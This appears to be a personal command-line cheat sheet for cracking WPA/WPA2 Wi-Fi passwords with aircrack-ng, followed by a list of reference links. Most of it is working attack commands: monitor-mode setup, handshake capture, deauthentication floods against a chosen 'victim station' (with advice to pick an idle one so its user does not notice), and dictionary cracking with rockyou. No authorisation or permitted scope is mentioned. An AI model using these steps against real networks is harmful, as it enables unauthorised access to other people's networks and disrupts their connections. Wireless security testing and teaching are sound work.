assuming you’ve got some password dictionaries ready already
see aircrack-obsolete for sniffing OPN and cracking WEP setups
Ubuntu
apt install aircrack-ng wifite ieee-data airodump-ng-oui-update
or from source
what kind of WLAN interface do you have?
ifconfig -a iwconfig
have a quick look at strongest available SSIDs before you proceed
ifconfig wlan0 up iwlist wlan0 scan | grep SSID | head
check if nothing is interfering and eventually kill those
systemctl stop avahi-daemon systemctl disable avahi-daemon systemctl stop avahi-daemon.socket systemctl disable avahi-daemon.socket pkill dhclient pkill wpa_supplicant pkill avahi-daemon airmon-ng check airmon-ng check kill
enter into monitor
mode instead of managed
mode.
this is optional as the NIC will turn into a sniffer anyhow while using airodump
.
you might notice that this does not make any difference on a WLAN controller
ifconfig wlan0 promisc
the right way would rather be
iwconfig wlan0 mode Monitor
but let’s use the dedicated airmon
tool we’ve got here.
I am not sure why it is changing the name of the sniffer interface.
airmon-ng start wlan0 iwconfig ifconfig
check which APs and SSIDs are there, and now look more precisely for associated stations
airodump-ng --manufacturer --uptime --wps -a wlan0mon # --ignore-negative-one q q
be it for WEP or for WPA/WPA2, you need to see some stations, otherwise you won’t get any WEP traffic for IVs nor hardly any WPA/WPA2 authentication handshake.
select an SSID with PSK
in the AUTH col and further look at it without noise nor channel switching
#mac=AP-MAC-ADDRESS-HERE chan=CHANNEL-HERE ssid=SSID-HERE
also choose a victim station – preferably the one that is most idling, to avoid being noticed by the user
station=STATION-MAC-ADDRESS-HERE
mkdir -p ~/crack/ cd ~/crack/ echo $chan echo $ssid mkdir $ssid/ cd $ssid/ rm -f $ssid-* airodump-ng --manufacturer --uptime --wps -a --channel $chan \ --essid $ssid --write $ssid wlan0mon # --bssid $mac --write $mac wlan0mon
and wait for the notice of a captured handshake to appear at the upper-right corner
you can also check with wireshark CLI
tshark -r $ssid-01.cap ...TODO...
you may otherwise speed up the acquisition of 4-way handshakes by de-authenticating stations. a single deauth packet is usually enough – you need to wait about 3 seconds for the supplicant to re-connect.
make sure the SAME SSID variable is defined in THAT OTHER TERMINAL…
echo $ssid echo $station aireplay-ng -e $ssid -s $station -c $station --deauth 1 wlan0mon # --or-- -a $mac
otherwise eventually increase the number of de-auth packets to be sent
aireplay-ng -e $ssid -s $station -c $station --deauth 20 wlan0mon # -g 9 -R --deauth-rc 9
and in last resort, in case there’s no handshake at all being captured
aireplay-ng -e $ssid --deauth 0 wlan0mon
eventually on a remote server where heavy load CPU and fan noise won’t hurt you…
passlist=/usr/share/wordlists/10-million-password-list-top-1000000.txt # atom 5m14.282s passlist=/usr/share/wordlists/rockyou.txt # ryzen 12m58,339s vs. atom 74m53.226s
echo $ssid ls -lhF $ssid-*.cap # got several captures? time nice aircrack-ng -w $passlist -e $ssid -a 2 $ssid-01.cap # --or-- -b $mac
You’re done with capturing? Go back to station
mode
airmon-ng stop wlan0mon iwconfig ifconfig
–or– if you didn’t use a dedicated sniffer interface
ifconfig wlan0 down iwconfig wlan0 mode Managed ifconfig wlan0 up
18:37:10 Waiting for beacon frame (BSSID: xx:xx:...) on channel xx 18:37:20 No such BSSID available.
==> make sure you define the variables accordingly in that other terminal…
Tutorial: How to Crack WPA/WPA2 https://www.aircrack-ng.org/doku.php?id=cracking_wpa
Aircrack-ng https://github.com/aircrack-ng
sniff traffic on a private SSID? https://networkengineering.stackexchange.com/questions/24236/sniff-traffic-on-a-private-ssid
Sniffing traffic on a secured wifi connection https://security.stackexchange.com/questions/97480/sniffing-traffic-on-a-secured-wifi-connection
WLAN (IEEE 802.11) capture setup https://wiki.wireshark.org/CaptureSetup/WLAN
How to sniff 802.11 packets without going into monitor mode? https://security.stackexchange.com/questions/130716/how-to-sniff-802-11-packets-without-going-into-monitor-mode
IEEE 802.11i-2004 https://en.wikipedia.org/wiki/IEEE_802.11i-2004
Capturing WPA/WPA2 Handshake [MIC/Hash Cracking Process] https://www.cyberpunk.rs/capturing-wpa-wpa2-handshake
How to Decrypt 802.11 https://wiki.wireshark.org/HowToDecrypt802.11
How to decrypt WPA traffic in Wireshark https://miloserdov.org/?p=2525
Wireshark WPA 4-way handshake https://superuser.com/questions/413225/wireshark-wpa-4-way-handshake
I couldn’t deauth any devices using aireplay-ng command in kali linux https://security.stackexchange.com/questions/197287/i-couldnt-deauth-any-devices-using-aireplay-ng-command-in-kali-linux
aireplay DeAuth not functioning https://forum.aircrack-ng.org/index.php?topic=853.0
Aireplay-ng deauth attack not working? https://forums.hak5.org/topic/42852-aireplay-ng-deauth-attack-not-working/
Hacking Wifi using PMKID and Aircrack-ng https://kalitut.com/hacking-wifi-using-pmkid-and-aircrack-ng/
Cracking WPA2 Passwords Using the New PMKID Hashcat Attack https://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-passwords-using-new-pmkid-hashcat-attack-0189379/
https://unix.stackexchange.com/questions/145192/aircrack-ng-shows-negative-channel https://forum.aircrack-ng.org/index.php?topic=1378.0 https://forum.backbox.org/software-support/aireplay-ng-ignore-negative-one/
Wifi deauthentication attacks and home security https://mjg59.dreamwidth.org/53968.html